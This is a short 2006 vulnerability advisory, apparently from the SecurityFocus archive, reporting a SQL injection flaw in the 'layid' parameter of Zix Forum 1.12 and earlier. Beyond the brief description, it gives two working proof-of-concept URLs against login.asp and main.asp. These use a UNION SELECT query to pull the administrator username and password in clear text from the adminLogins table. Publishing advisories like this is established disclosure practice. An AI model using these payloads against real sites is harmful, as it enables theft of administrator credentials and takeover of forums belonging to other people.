Zix Forum <= 1.12 (layid) SQL Injection Vulnerability May 20 2006 12:34PM
i6d hotmail com
Zix Forum <= 1.12 (layid) SQL Injection Vulnerability

Vulnerability:

--------------------

SQL_Injection:

Input passed to the "layid" parameter in 'settings.asp' not properly sanitised before being used in a SQL query.

This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.

Successful exploitation extracts username and password of administrator in clear text .

Proof of Concepts:

--------------------

site.com/zix/login.asp?layid=-1%20union%20select%201,null,null,1,1,1,1,n
ull,1,1,J_User,null,1,1,1,1,1,J_Pass,null,null,null,null,1,1,1,1,1,1,1,1
,1,1,1,1,1,1,null%20from%20adminLogins where approve=1 and '1'='1'

site.com/zix/main.asp?layid=-1%20union%20select%201,null,null,null,1,1,1
,null,1,1,J_User,null,1,1,1,1,1,J_Pass,null,null,null,null,1,1,1,1,1,1,1
,1,1,1,1,1,1,null,null%20from%20adminLogins where approve=1 and '1'='1'

-------

By PHP Emperor

# i6d[at]hotmail[dot]com

[ reply ]


 

Privacy Statement
Copyright 2010, SecurityFocus